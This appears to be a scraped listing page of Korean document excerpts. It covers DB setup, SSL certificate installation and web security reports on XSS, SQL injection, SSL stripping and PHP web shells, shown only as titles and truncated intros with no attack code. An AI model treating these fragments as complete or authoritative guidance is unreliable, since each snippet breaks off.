Microsoft PowerPoint - GUI _DB연동.ppt [호환 모드] GUI 설계 6 주차 DB 연동김문정 tops@yd.ac.kr 강의순서강의전환경 JDK 설치및환경설정톰캣설치및환경설정이클립스 (JEE) 설치및환경설정 MySQL( 드라이버 ) 설치및커넥터드라이브연결 DB 생성 - 계정생성이클립스에서 DB에연결서버생성 - 프로젝트생성 DB연결테이블생성및등록 2 MySQL 설치확인 mysql - u root -p MySQL 에데이터베이스추가

More information

Microsoft Word - ntasFrameBuilderInstallGuide2.5.doc

Microsoft Word - ntasFrameBuilderInstallGuide2.5.doc NTAS and FRAME BUILDER Install Guide NTAS and FRAME BUILDER Version 2.5 Copyright 2003 Ari System, Inc. All Rights reserved. NTAS and FRAME BUILDER are trademarks or registered trademarks of Ari System,

More information

SQL Developer Connect to TimesTen 유니원아이앤씨 DB 기술지원팀 2010 년 07 월 28 일 문서정보 프로젝트명 SQL Developer Connect to TimesTen 서브시스템명 버전 1.0 문서명 작성일 작성자

SQL Developer Connect to TimesTen 유니원아이앤씨 DB 기술지원팀 2010 년 07 월 28 일 문서정보 프로젝트명 SQL Developer Connect to TimesTen 서브시스템명 버전 1.0 문서명 작성일 작성자 SQL Developer Connect to TimesTen 유니원아이앤씨 DB 팀 2010 년 07 월 28 일 문서정보 프로젝트명 SQL Developer Connect to TimesTen 서브시스템명 버전 1.0 문서명 작성일 2010-07-28 작성자 김학준 최종수정일 2010-07-28 문서번호 20100728_01_khj 재개정이력 일자내용수정인버전

More information

<3035303432365FC8A8C6E4C0CCC1F620B0B3B9DF20BAB8BEC8B0A1C0CCB5E5C3D6C1BE28C0FAC0DBB1C7BBE8C1A6292E687770>

<3035303432365FC8A8C6E4C0CCC1F620B0B3B9DF20BAB8BEC8B0A1C0CCB5E5C3D6C1BE28C0FAC0DBB1C7BBE8C1A6292E687770> 개 요 홈페이지 해킹 현황 및 사례 홈페이지 개발시 보안 취약점 및 대책 주요 애플리케이션 보안 대책 결 론 참고자료 [부록1] 개발 언어별 로그인 인증 프로세스 예제 [부록2] 대규모 홈페이지 변조 예방을 위한 권고(안) [부록3] 개인정보의 기술적 관리적 보호조치 기준(안) [부록4] 웹 보안관련 주요 사이트 리스트 7000 6,478 6000 5000

More information

untitled

untitled 디렉토리리스팅취약점을이용한게임 DB 서버해킹사고 2006. 8. 3 본보고서의전부나일부를인용시반드시 [ 자료 : 한국정보보호진흥원 (KISA)] 를명시하여주시기바랍니다. 1. 개요중국발해킹의표적이온라인게임서버에까지이어지고있다. 특히중국에는현재수많은게임작업장이있으며, 이곳에서는많은중국인들이단순히게임을즐기는것이아니라아이템매매로인한금전적인이득을목적으로한범죄행위를하고있다.

More information

< 목차 > Ⅰ. 개요 3 Ⅱ. 실시간스팸차단리스트 (RBL) ( 간편설정 ) 4 1. 메일서버 (Exchange Server 2007) 설정변경 4 2. 스팸차단테스트 10

< 목차 > Ⅰ. 개요 3 Ⅱ. 실시간스팸차단리스트 (RBL) ( 간편설정 ) 4 1. 메일서버 (Exchange Server 2007) 설정변경 4 2. 스팸차단테스트 10 (https://www.kisarbl.or.kr) < 목차 > Ⅰ. 개요 3 Ⅱ. 실시간스팸차단리스트 (RBL) ( 간편설정 ) 4 1. 메일서버 (Exchange Server 2007) 설정변경 4 2. 스팸차단테스트 10 Ⅰ. 개요 실시간스팸차단리스트 (RBL) 는메일서버를운영하는누구나손쉽게효과적으로스팸수신을차단하는데이용할수있도록한국인터넷진흥원 (KISA)

More information

Bind Peeking 한계에따른 Adaptive Cursor Sharing 등장 엑셈컨설팅본부 /DB 컨설팅팀김철환 Bind Peeking 의한계 SQL 이최초실행되면 3 단계의과정을거치게되는데 Parsing 단계를거쳐 Execute 하고 Fetch 의과정을통해데이터

Bind Peeking 한계에따른 Adaptive Cursor Sharing 등장 엑셈컨설팅본부 /DB 컨설팅팀김철환 Bind Peeking 의한계 SQL 이최초실행되면 3 단계의과정을거치게되는데 Parsing 단계를거쳐 Execute 하고 Fetch 의과정을통해데이터 Bind Peeking 한계에따른 Adaptive Cursor Sharing 등장 엑셈컨설팅본부 /DB 컨설팅팀김철환 Bind Peeking 의한계 SQL 이최초실행되면 3 단계의과정을거치게되는데 Parsing 단계를거쳐 Execute 하고 Fetch 의과정을통해데이터를사용자에게전송하게되며 Parsing 단계에서실행계획이생성된다. Bind 변수를사용하는 SQL

More information

WebKnight를 활용한 IIS 웹서버 보안

WebKnight를 활용한 IIS 웹서버 보안 NTFAQ Korea (http://www.ntfaq.co.kr) 이종량 (jrlee@ntfaq.co.kr) 1. WebKnight에대해서 WebKnight의정의 WebKnight의필요성 2. WebKnight의설치 3. 파일의구성 4. WebKnight의설정 5. 필터링 (SQL Injection Keyword) 6. 로그 WebKnight의로그 WebKnight의로그분석

More information

<3035313230325FBBE7B0EDB3EBC6AE5FB5F0C6FAC6AEC6D0BDBABFF6B5E5C3EBBEE0C1A128BCF6C1A4292E687770>

<3035313230325FBBE7B0EDB3EBC6AE5FB5F0C6FAC6AEC6D0BDBABFF6B5E5C3EBBEE0C1A128BCF6C1A4292E687770> 네트워크 장비의 디폴트 로그인 패스워드 취약점 및 대책 2005. 11. 30 본 보고서의 전부나 일부를 인용시 반드시 [자료: 한국정보보호진흥원(KISA)]룰 명시하여 주시기 바랍니다. - 1 - 1. 개요 패스워드 관리는 보안의 가장 기본적인 사항으로 유추하기 어려운 패스워드를 사용하고, 주기적 으로 패스워드를 변경하는 등 패스워드 관리에 신경을 많이 쓰고

More information

SSL Strip Attack JAC (SemiDntmd) 이우승 semidntmd.tistory.com

SSL Strip Attack JAC (SemiDntmd) 이우승 semidntmd.tistory.com SSL Strip Attack JAC (SemiDntmd) 이우승 semidntmd.tistory.com Content 1. SSL Strip - SSL? - SSL MITM - SSL Strip 2. SSL Strip 공격 3. 대응방법 Copyright@2012 All Rights Reserved by SemiDntmd 2 1. SSL Strip 1-1

More information

PowerPoint 프레젠테이션

PowerPoint 프레젠테이션 Chapter 04. 웹보안 : 웹, 그무한한가능성과함께성장한해킹 1. 웹에대한이해 2. HTTP에대한이해 3. 웹서비스에대한이해 4. 웹해킹에대한이해 5. 웹의주요취약점 10가지 6. 웹취약점보안 01 웹에대한이해 인터넷의역사 처음에는대학에서연구실간데이터전송을위해, 단순히하나의시스템과다른하나의시스템간의통신을위한프로토콜을만듦. 프로토콜을해석한후이를다른프로토콜로바꾸어다른시스템으로전송해주는장치인게이트웨이

More information

<4D F736F F F696E74202D C0A5BCADB9F620BAB8BEC8BCB3C1A420B0A1C0CCB5E52E707074>

<4D F736F F F696E74202D C0A5BCADB9F620BAB8BEC8BCB3C1A420B0A1C0CCB5E52E707074> Apache 웹서버보안문제 웹서버 / 클라이언트 / 애플리케이션자체의버그 웹서버 / 클라이언트 / 애플리케이션설정의오류 침입차단시스템의웹서비스오픈 SANS TOP20 Vulnerabilities Top Vulnerabilities to Windows Systems Top Vulnerabilities to UNIX Systems W1. Web Servers &

More information

MySQL-.. 1

MySQL-.. 1 MySQL- 기초 1 Jinseog Kim Dongguk University jinseog.kim@gmail.com 2017-08-25 Jinseog Kim Dongguk University jinseog.kim@gmail.com MySQL-기초 1 2017-08-25 1 / 18 SQL의 기초 SQL은 아래의 용도로 구성됨 데이터정의 언어(Data definition

More information

Microsoft Word - CrossSiteScripting[XSS].docx

Microsoft Word - CrossSiteScripting[XSS].docx 1 Education Giehong.E goodbyestar@nate.com abstract - 영리를목적으로한곳에서의불법적인배포는금지합니다. - 문서의내용은임의의가상테스트를대상으로한 OWASP10 의기본적인내용들이며교육을위해만들어진문서입니다. - 비인가받은악의적인행동은불법이며법적책임또한당사자에게있습니다 Copyright@2008 All Rights Reserved

More information

<C0CCBCBCBFB52DC1A4B4EBBFF82DBCAEBBE7B3EDB9AE2D313939392D382E687770>

<C0CCBCBCBFB52DC1A4B4EBBFF82DBCAEBBE7B3EDB9AE2D313939392D382E687770> i ii iii iv v vi 1 2 3 4 가상대학 시스템의 국내외 현황 조사 가상대학 플랫폼 개발 이상적인 가상대학시스템의 미래상 제안 5 웹-기반 가상대학 시스템 전통적인 교수 방법 시간/공간 제약을 극복한 학습동기 부여 교수의 일방적인 내용전달 교수와 학생간의 상호작용 동료 학생들 간의 상호작용 가상대학 운영 공지사항,강의록 자료실, 메모 질의응답,

More information

1) 인증서만들기 ssl]# cat >www.ucert.co.kr.pem // 설명 : 발급받은인증서 / 개인키파일을한파일로저장합니다. ( 저장방법 : cat [ 개인키

1) 인증서만들기 ssl]# cat   >www.ucert.co.kr.pem // 설명 : 발급받은인증서 / 개인키파일을한파일로저장합니다. ( 저장방법 : cat [ 개인키 Lighttpd ( 단일도메인 ) SSL 인증서신규설치가이드. [ 고객센터 ] 한국기업보안. 유서트기술팀 1) 인증서만들기 [root@localhost ssl]# cat www.ucert.co.kr.key www.ucert.co.kr.crt >www.ucert.co.kr.pem // 설명 : 발급받은인증서 / 개인키파일을한파일로저장합니다. ( 저장방법 : cat

More information

SSL인증서 설치 매뉴얼 (Apache)

SSL인증서 설치 매뉴얼 (Apache) SSL 인증서설치매뉴얼 (Apache) 백업된인증서설치 본문서에안내된버전이외의다른버전을사용하시는경우안내내용과차이가있을수있습니다. 본문서는기본적인참고용자료이며, 구성환경에따라안내내용과차이가있을수있습니다. 본문서는서버담당자를기준으로작성되었습니다. 웹서버인증서를설치할서버담당자에게전달하여주시기바랍니다. ** 인증서설치전확인사항 ** 인증서설치시 SSL 관련설정은기존

More information

<5B4B D5FB1B9B3BB20C5ACB6F3BFECB5E520BCADBAF1BDBA20BAB8BEC820C3EBBEE0C1A120C1A1B0CB2020B3BBBFEB2E687770>

<5B4B D5FB1B9B3BB20C5ACB6F3BFECB5E520BCADBAF1BDBA20BAB8BEC820C3EBBEE0C1A120C1A1B0CB2020B3BBBFEB2E687770> 국내클라우드서비스보안취약점점검 취약성점검계획 수행방법 정보보호체계및정책수립, 정보시스템취약점분석, 모의해킹및소스코드분석, 어플리케이션분석 4개영역에대한취약점점검을선택적으로수행 구분 점검도구 점검방법 정보보호체계및정책수립 Check-List 인터뷰및현장실사 정보시스템취약점진단 AppScan, Nessus, Shell 등 자동 수동진단도구사용 모의해킹및소스코드분석

More information

1) 인증서만들기 ssl]# cat >www.ucert.co.kr.pem // 설명 : 발급받은인증서 / 개인키파일을한파일로저장합니다. ( 저장방법 : cat [ 개인키

1) 인증서만들기 ssl]# cat   >www.ucert.co.kr.pem // 설명 : 발급받은인증서 / 개인키파일을한파일로저장합니다. ( 저장방법 : cat [ 개인키 Lighttpd ( 멀티도메인 ) SSL 인증서신규설치가이드. [ 고객센터 ] 한국기업보안. 유서트기술팀 1) 인증서만들기 [root@localhost ssl]# cat www.ucert.co.kr.key www.ucert.co.kr.crt >www.ucert.co.kr.pem // 설명 : 발급받은인증서 / 개인키파일을한파일로저장합니다. ( 저장방법 : cat

More information

<5BB5BFB8EDB4EB2D E4B5D C0A5BDA9C0C720BAD0BCAEB0FA20B4EBC0C020B9E6BEC82E687770>

<5BB5BFB8EDB4EB2D E4B5D C0A5BDA9C0C720BAD0BCAEB0FA20B4EBC0C020B9E6BEC82E687770> 기술문서 08. 10. 25. 작성 PHP 기반웹쉘의동작원리와공개웹쉘의기능분석및대응방안 작성자 : 동명대학교 THINK 정정홍 (zeratul621@naver.com) 1. 시작하면서 p. 2 2. 웹쉘의동작원리 p. 3 3. r57shell p. 5 4. kcwebtelnet p. 9 5. phpremoteview p. 10 6. 웹쉘대응방안 p. 12 동명대학교정보보호동아리

More information

10.ppt

10.ppt : SQL. SQL Plus. JDBC. SQL >> SQL create table : CREATE TABLE ( ( ), ( ),.. ) SQL >> SQL create table : id username dept birth email id username dept birth email CREATE TABLE member ( id NUMBER NOT NULL

More information

설명 Description 상세정보 네이버에서운영하는서비스중하나인쥬니어네이버 ( 이하쥬니버 ) 에서는쥬니버서비스와 관련하여도움을주기위한 [ 그림 1] 과같은플래시애플리케이션이서비스되고있다.[2] [ 그림 1] 쥬니어네이버에서서비스중인쥬니버도우미플래시애플리케이션 해당플래

설명 Description 상세정보 네이버에서운영하는서비스중하나인쥬니어네이버 ( 이하쥬니버 ) 에서는쥬니버서비스와 관련하여도움을주기위한 [ 그림 1] 과같은플래시애플리케이션이서비스되고있다.[2] [ 그림 1] 쥬니어네이버에서서비스중인쥬니버도우미플래시애플리케이션 해당플래 네이버플래시애플리케이션 XSS 취약점분석보고서 작성일 2013/04/24 작성자 카이스트시스템보안연구실 홍현욱 (karmatia@kaist.ac.kr) 최현우 (zemisolsol@kaist.ac.kr) 김용대 (yongdaek@kaist.ac.kr) 요약 플래시애플리케이션은보고서작성일을기준으로전체웹사이트의 19.5% 가사용하고있으며 [5] 이러한플래시애플리케이션을작동시켜주는플래시플레이어는웹브라우저에기본적으로설치되어있거나웹브라우저에서웹사이트를이용하는사용자들에게자동으로설치하도록유도한다.

More information

Microsoft Word FCKeditor.doc

Microsoft Word FCKeditor.doc FCKeditor 취약점분석 머리말 본문서에서는 FCKeditor 의취약점에대해설명하고해당취약점에대한대응책을소개하는자료입니 다. 본문서는웹해킹에대한일반적인지식이있는보안전문가를대상으로작성되었습니다. 따라서, 웹 해킹에대한기본적인기술에대해서는별도로설명하지않습니다. 등록상표 PIOLINK 는 파이오링크의등록상표입니다. 일러두기 본사용설명서의저작권은 파이오링크에있습니다.

More information

Cloud Friendly System Architecture

Cloud Friendly System Architecture -Service Clients Administrator 1. -Service 구성도 : ( 좌측참고 ) LB(LoadBlancer) 2. -Service 개요 ucloud Virtual Router F/W Monitoring 개념 특징 적용가능분야 Server, WAS, DB 로구성되어 web service 를클라우드환경에서제공하기위한 service architecture

More information

게시판 스팸 실시간 차단 시스템

게시판 스팸 실시간 차단 시스템 오픈 API 2014. 11-1 - 목 차 1. 스팸지수측정요청프로토콜 3 1.1 스팸지수측정요청프로토콜개요 3 1.2 스팸지수측정요청방법 3 2. 게시판스팸차단도구오픈 API 활용 5 2.1 PHP 5 2.1.1 차단도구오픈 API 적용방법 5 2.1.2 차단도구오픈 API 스팸지수측정요청 5 2.1.3 차단도구오픈 API 스팸지수측정결과값 5 2.2 JSP

More information

제이쿼리 (JQuery) 정의 자바스크립트함수를쉽게사용하기위해만든자바스크립트라이브러리. 웹페이지를즉석에서변경하는기능에특화된자바스크립트라이브러리. 사용법 $( 제이쿼리객체 ) 혹은 $( 엘리먼트 ) 참고 ) $() 이기호를제이쿼리래퍼라고한다. 즉, 제이쿼리를호출하는기호

제이쿼리 (JQuery) 정의 자바스크립트함수를쉽게사용하기위해만든자바스크립트라이브러리. 웹페이지를즉석에서변경하는기능에특화된자바스크립트라이브러리. 사용법 $( 제이쿼리객체 ) 혹은 $( 엘리먼트 ) 참고 ) $() 이기호를제이쿼리래퍼라고한다. 즉, 제이쿼리를호출하는기호 제이쿼리 () 정의 자바스크립트함수를쉽게사용하기위해만든자바스크립트라이브러리. 웹페이지를즉석에서변경하는기능에특화된자바스크립트라이브러리. 사용법 $( 제이쿼리객체 ) 혹은 $( 엘리먼트 ) 참고 ) $() 이기호를제이쿼리래퍼라고한다. 즉, 제이쿼리를호출하는기호 CSS와마찬가지로, 문서에존재하는여러엘리먼트를접근할수있다. 엘리먼트접근방법 $( 엘리먼트 ) : 일반적인접근방법

More information

Microsoft Word - junior.docx

Microsoft Word - junior.docx Black Falcon Team 첫번째입팀과제보고서 - Damm Vulnerable Web Application - Name : 박영근 Intro Lesson 1 : Brute Force 4 Lesson 2 : Command Execution 9 Lesson 3 : CSRF. 10 Lesson 4 : Insecure CAPTCHA 13 Lesson 5 : File

More information

The Pocket Guide to TCP/IP Sockets: C Version

The Pocket Guide to  TCP/IP Sockets: C Version 인터넷프로토콜 5 장 데이터송수신 (3) 1 파일전송메시지구성예제 ( 고정크기메시지 ) 전송방식 : 고정크기 ( 바이너리전송 ) 필요한전송정보 파일이름 ( 최대 255 자 => 255byte 의메모리공간필요 ) 파일크기 (4byte 의경우최대 4GB 크기의파일처리가능 ) 파일내용 ( 가변길이, 0~4GB 크기 ) 메시지구성 FileName (255bytes)

More information

Eclipse 와 Firefox 를이용한 Javascript 개발 발표자 : 문경대 11 년 10 월 26 일수요일

Eclipse 와 Firefox 를이용한 Javascript 개발 발표자 : 문경대 11 년 10 월 26 일수요일 Eclipse 와 Firefox 를이용한 Javascript 개발 발표자 : 문경대 Introduce Me!!! Job Jeju National University Student Ubuntu Korean Jeju Community Owner E-Mail: ned3y2k@hanmail.net Blog: http://ned3y2k.wo.tc Facebook: http://www.facebook.com/gyeongdae

More information

SAS9.2_SAS_Enterprise_Miner_install_guide_single_user_v2

SAS9.2_SAS_Enterprise_Miner_install_guide_single_user_v2 [Win] SAS Enterprise Miner6.1 설치가이드 - Single User 작성자 : 기술지원팀 (SAS Korea) 단계 1) 설치전주의 / 확인사항 2) 사용자생성및권한할당 3) SAS Software Deport 생성 4) SAS Enterprise Miner 설치 (SAS Foundation + Enterprise Miner 6.1) 5)

More information

(Microsoft Word - \301\266\301\326\272\300_XSS.docx)

(Microsoft Word - \301\266\301\326\272\300_XSS.docx) XSS(Cross Site Scripting) 1. XSS 란무엇인가 XSS 란 Cross Site Scripting 의약자 (CSS 라고도불리기도하나 Cascading Style Sheets 와혼용되어일반적으로 XSS 를많이사용한다.) 로 Web 보안취약점중하나이다. 이러한 XSS 는인터넷이생겨나고활성화되기전, 홈페이지소개및단지정보를제공하는정적인페이지에서인터넷이활성화된현재,

More information

PowerPoint 프레젠테이션

PowerPoint 프레젠테이션 사용자계정관리 운영체제실습 목차 Ⅲ. 사용자계정관리 4.1 사용자계정관리 4.2 그룹관리 4.3 사용자계정관련파일 4.4 패스워드관리 4.5 사용자신분확인 4.1 사용자계정관리 사용자생성관련명령어 사용자생성 : useradd / adduser 사용자삭제 : userdel 사용자정보변경 : usermod 패스워드설정및변경 : passwd 그룹생성관련명령어 group

More information

슬라이드 1

슬라이드 1 NeoDeveloper 설치가이드 차례 1. 환경 3 2. 설치 3 2.1 웹서버설치 3 Tomcat 7 3 JDK 1.6 3 2.2 NeoDeveloper 설치 3 Neo Developer 서버구성 3 Demo용 User Application 구성 4 Neo Developer 서버 Data File 4 Client 개발 Tool 설치 4 3. 설정 5 3.1

More information

4. CSR 값확인. (vi csr.pem) CSR(Certificate Signing Request) 즉, 인증서서명요청입니다. 이는자신이설치할웹서버에서 DN 값, 각종정보를암호화한파일로써 한국전자인증 신청란에서붙여넣으면됩니다. 인증서설치 1. 직접 CSR 및 KEY

4. CSR 값확인. (vi csr.pem) CSR(Certificate Signing Request) 즉, 인증서서명요청입니다. 이는자신이설치할웹서버에서 DN 값, 각종정보를암호화한파일로써 한국전자인증 신청란에서붙여넣으면됩니다. 인증서설치 1. 직접 CSR 및 KEY 키생성및 CSR 생성 키생성을위해 OpenSSL 설치디렉토리에서아래명령대로생성 1. 랜덤넘버생성 $ openssl md5 * > rand.dat 2. 키쌍생성 openssl genrsa -rand rand.cat -des3 1024 > key.pem 3. 생성된키쌍을이용하여 CSR 생성 openssl req -new -key key.pem > csr.pem

More information

Microsoft Word - Windows_apahce_php_CUBRID2008

Microsoft Word - Windows_apahce_php_CUBRID2008 Windows 에서 Apache, PHP 를이용하여 CUBRID 사용하기 소개 : Windows 환경에서 Apache 웹서버와 PHP 를이용하여 CUBRID 를사용하기위하여 PHP CUBRID module 를 설치하는방법및간단한 CUBRID 연동방법을소개한다. 연동에대한상세한방법은매뉴얼상의 PHP API 부분을 참고하기바란다 2008-10-20 기술컨설팅팀남재우,

More information

JDBC 소개및설치 Database Laboratory

JDBC 소개및설치 Database Laboratory JDBC 소개및설치 JDBC } What is the JDBC? } JAVA Database Connectivity 의약어 } 자바프로그램안에서 SQL 을실행하기위해데이터베이스를연결해주는응용프로그램인터페이스 } 연결된데이터베이스의종류와상관없이동일한방법으로자바가데이터베이스내에서발생하는트랜잭션을제어할수있도록하는환경을제공 2 JDBC Driver Manager }

More information

0. 들어가기 전

0. 들어가기 전 컴퓨터네트워크 14 장. 웹 (WWW) (3) - HTTP 1 이번시간의학습목표 HTTP 의요청 / 응답메시지의구조와동작원리이해 2 요청과응답 (1) HTTP (HyperText Transfer Protocol) 웹브라우저는 URL 을이용원하는자원표현 HTTP 메소드 (method) 를이용하여데이터를요청 (GET) 하거나, 회신 (POST) 요청과응답 요청

More information

3) MySQL data 백업백업방법 : dump 파일로저장저장위치 : /backup/mysqldump 백업주기 : 시간별 (/etc/cron.hourly) 또는일별 (/etc/cron.daily) 보관기간 : 7 일백업스크립트 : 아래예제 6-1). 참조 4) 웹데이

3) MySQL data 백업백업방법 : dump 파일로저장저장위치 : /backup/mysqldump 백업주기 : 시간별 (/etc/cron.hourly) 또는일별 (/etc/cron.daily) 보관기간 : 7 일백업스크립트 : 아래예제 6-1). 참조 4) 웹데이 Local Backup 지침 < 로컬백업지침 ver 1.0> 아래의로컬백업지침은원격백업지침의기초가됩니다. 1. 준비사항 1) 운영중인하드디스크와는별도로백업하려는 Data 용량의최소 4 배이상되는하드디스크를준비한다. 2) 백업하드디스크의용량이남을지라도백업용도외에는사용하지않는다. 3) 백업하려는데이타항목을선정하여, 백업디렉토리를트리구조화한다. 2. 백업방법 1)

More information

untitled

untitled 보안서버구축가이드 8 Ⅲ. SSL 방식보안서버구축하기 1. 소개및보안서버구축절차 가. 개요 SSL은 Secure Sockets Layer의머리글이며, 1994년 Netscape에의해전세계적인표준보안기술이개발되었습니다. SSL 방식은웹브라우저와서버간의통신에서정보를암호화함으로써도중에해킹을통해정보가유출되더라도정보의내용을보호할수있는기능을갖춘보안솔루션으로전세계적으로수백만개의웹사이트에서사용하고있습니다.

More information

PowerPoint 프레젠테이션

PowerPoint 프레젠테이션 HTML5 웹프로그래밍입문 부록. 웹서버구축하기 1 목차 A.1 웹서버시스템 A.2 PHP 사용하기 A.3 데이터베이스연결하기 2 A.1 웹서버시스템 3 웹서버의구축 웹서버컴퓨터구축 웹서버소프트웨어설치및실행 아파치 (Apache) 웹서버가대표적 서버실행프로그램 HTML5 폼을전달받아처리 PHP, JSP, Python 등 데이터베이스시스템 서버측에데이터를저장및효율적관리

More information

Microsoft PowerPoint - web-part03-ch20-XMLHttpRequest기본.pptx

Microsoft PowerPoint - web-part03-ch20-XMLHttpRequest기본.pptx 과목명 : 웹프로그래밍응용교재 : 모던웹을위한 JavaScript Jquery 입문, 한빛미디어 Part3. Ajax Ch20. XMLHttpRequest 2014년 1학기 Professor Seung-Hoon Choi 20 XMLHttpRequest XMLHttpRequest 객체 자바스크립트로 Ajax를이용할때사용하는객체 간단하게 xhr 이라고도부름 서버

More information

uFOCS

uFOCS 1 기 : 기 UF_D_V250_002 기 기 기 품 ufocs 기 v2.5.0 히기기기기기기기기기 기 Manual 기 version 기 3.2 기품 2011.7.29 히기 345-13 1 Tel : 02-857-3051 Fax : 02-3142-0319 : http://www.satu.co.kr 2010 SAT information Co., Ltd. All

More information

강의 개요

강의 개요 DDL TABLE 을만들자 웹데이터베이스 TABLE 자료가저장되는공간 문자자료의경우 DB 생성시지정한 Character Set 대로저장 Table 생성시 Table 의구조를결정짓는열속성지정 열 (Clumn, Attribute) 은이름과자료형을갖는다. 자료형 : http://dev.mysql.cm/dc/refman/5.1/en/data-types.html TABLE

More information

BEA_WebLogic.hwp

BEA_WebLogic.hwp BEA WebLogic Server SSL 설정방법 - Ver 1.0-2008. 6 개정이력 버전개정일개정내용 Ver 1.0 2008 년 6 월 BEA WebLogic Server SSL 설명서최초작성 본문서는정보통신부 한국정보보호진흥원의 보안서버구축가이드 를참고하여작성되었습니다. 본문서내용의무단도용및사용을금합니다. < 목차 > 1. 개인키및 CSR 생성방법

More information

Microsoft PowerPoint - [Practice #1] APM InstalI.ppt

Microsoft PowerPoint - [Practice #1] APM InstalI.ppt Practice #1 APM Install 2005. 8. 31 Lee Seung-Bok http://hpclab.uos.ac.kr Contents 2 APM 소개 Apache 설치 PHP 설치 MySQL 설치기타사항 Q & A APM(Apache,, PHP, MySQL) 소개 3 Apache PHP 현재전세계에서가장보편적으로사용되고있는오픈소스웹서버안정성및우수한기능

More information

표준프레임워크 Nexus 및 CI 환경구축가이드 Version 3.8 Page 1

표준프레임워크 Nexus 및 CI 환경구축가이드 Version 3.8 Page 1 표준프레임워크 Nexus 및 CI 환경구축가이드 Version 3.8 Page 1 Index 1. 표준프레임워크 EGOVCI 팩키지설치... 3 1.1 개요... 3 1.2 EGOVCI 압축풀기... 3 1.3 EGOVCI 시스템구성... 3 1.4 CI 시스템구동 (START/STOP)... 4 2. NEXUS 설정정보... 6 2.1 NEXUS 서버구동

More information

SBR-100S User Manual

SBR-100S User Manual ( 1 / 13 ) SBR-100S 모델에 대한 사용자 펌웨어 업그레이드 방법을 안내해 드립니다. SBR-100S 는 신규 펌웨어가 있을시 FOTA(자동업데이트) 기능을 통하여 자동 업그레이드가 되며, 필요시 사용자가 신규 펌웨어를 다운받아 수동으로 업그레이드 할 수 있습니다. 1. 준비하기 1.1 연결 장치 준비 펌웨어 업그레이드를 위해서는 SBR-100S

More information

<4D F736F F F696E74202D FC0CEC5CDB3DD20BAB8BEC8205BC8A3C8AF20B8F0B5E55D>

<4D F736F F F696E74202D FC0CEC5CDB3DD20BAB8BEC8205BC8A3C8AF20B8F0B5E55D> 이장에서다룰내용 정보보안개론 5 장 1 HTTP 프로토콜의동작원리를이해한다. 1 2 구글과같은검색엔진을통해정보를수집하는방법을알아본다. 2 3 웹해킹에서파일접근과관련된공격을살펴본다. 3 4 리버스텔넷을이해한다. 2 5 웹에서의인증의구조와이를우회하는방법을알아본다. 3 6 패킷변조를통해가능한공격을살펴본다. 2 7 XSS 공격및 SQL 삽입공격을살펴본다. Section

More information

구축환경 OS : Windows 7 그외 OS 의경우교재 p26-40 참조 Windows 의다른버전은조금다르게나타날수있음 Browser : Google Chrome 다른브라우저를사용해도별차이없으나추후수업의모든과정은크롬사용 한

구축환경 OS : Windows 7 그외 OS 의경우교재 p26-40 참조 Windows 의다른버전은조금다르게나타날수있음 Browser : Google Chrome 다른브라우저를사용해도별차이없으나추후수업의모든과정은크롬사용   한 수업환경구축 웹데이터베이스구축및실습 구축환경 OS : Windows 7 그외 OS 의경우교재 p26-40 참조 Windows 의다른버전은조금다르게나타날수있음 Browser : Google Chrome 다른브라우저를사용해도별차이없으나추후수업의모든과정은크롬사용 http://chrome.google.com 한림대학교웹데이터베이스 - 이윤환 APM 설치 : AUTOSET6

More information

HLS(HTTP Live Streaming) 이용가이드 1. HLS 소개 Apple iphone, ipad, ipod의운영체제인 ios에서사용하는표준 HTTP 기반스트리밍프로토콜입니다. 2. HLS 지원대상 - 디바이스 : iphone/ipad/ipod - 운영체제 :

HLS(HTTP Live Streaming) 이용가이드 1. HLS 소개 Apple iphone, ipad, ipod의운영체제인 ios에서사용하는표준 HTTP 기반스트리밍프로토콜입니다. 2. HLS 지원대상 - 디바이스 : iphone/ipad/ipod - 운영체제 : HLS(HTTP Live Streaming) 이용가이드 1. HLS 소개 Apple iphone, ipad, ipod의운영체제인 ios에서사용하는표준 HTTP 기반스트리밍프로토콜입니다. 2. HLS 지원대상 - 디바이스 : iphone/ipad/ipod - 운영체제 : ios 3.0 이상 - 콘텐츠형식 : MP4 (H264,AAC ), MP3 * 디바이스별해상도,

More information

Microsoft Word - Blind Sql Injection.doc

Microsoft Word - Blind Sql Injection.doc Blind Sql Injection MySQL 5.0 본문서는배포는누구나마음대로수정및배포하실수있습니다. 테스트환경 : MySQL 5.3, PHP 5.2 - 방립동 - 개요. MySQL 이 3.0 버전에서 4.0 버전으로업그레이되되면서 UNION 절을사용할수있게되었습니다. 따라서 UNION을이용한공격방법이소개되었죠. 또한블라인드인젝션기법을이용한공격방법이문서나,

More information

Module 4 Active Directory Domain Services 관리자동화

Module 4 Active Directory Domain Services 관리자동화 Module 4 Active Directory Domain Services 관리자동화 개요 관리를위한명령줄도구사용 관리를위한 Windows PowerShell 사용 Windows PowerShell 을사용한 Bulk 작업수행 Lesson 1: 관리를위한명령줄도구사용 관리를위한명령줄도구사용의이점 csvde 란? ldifde 란? DS 명령이란? 관리를위한명령줄도구사용의이점

More information

Microsoft PowerPoint - 11주차_Android_GoogleMap.ppt [호환 모드]

Microsoft PowerPoint - 11주차_Android_GoogleMap.ppt [호환 모드] Google Map View 구현 학습목표 교육목표 Google Map View 구현 Google Map 지원 Emulator 생성 Google Map API Key 위도 / 경도구하기 위도 / 경도에따른 Google Map View 구현 Zoom Controller 구현 Google Map View (1) () Google g Map View 기능 Google

More information

VPN.hwp

VPN.hwp Linksys VPN Router RV042&RV082 VPN Router 용 VPN 터널설정 한국어사용자설명서 V1.0 Table of Content 1 Gateway to Gateway 설정... 1 STEP 1 - Gateway to Gateway 터널생성하기... 1 STEP 2 - 터널정보입력하기... 1 STEP 3 - Gateway to Gateway

More information

C++ Programming

C++ Programming C++ Programming 예외처리 Seo, Doo-okok clickseo@gmail.com http://www.clickseo.com 목 차 예외처리 2 예외처리 예외처리 C++ 의예외처리 예외클래스와객체 3 예외처리 예외를처리하지않는프로그램 int main() int a, b; cout > a >> b; cout

More information

웹서버보안취약점대응및조치 교육사이버안전센터

웹서버보안취약점대응및조치 교육사이버안전센터 웹서버보안취약점대응및조치 2010. 5. 교육사이버안전센터 목차 Ⅰ 웹보안개요 Ⅱ Ⅲ Ⅳ 최신기술동향주요해킹기술및대응방안취약점사고사례 Ⅴ 참고자료 Ⅰ 웹보안개요 I. 웹보안개요 1. 웹구조의이해 URL: 프로토콜 :// 호스트명 [: 포트번호 ]/[ 경로 /] 파일명 [?Param= 값 ] HTTP: // www.ecsc.go.kr / Login.jsp? User=name

More information

76 XSS 하 Huge-IT Slider admin.php XSS

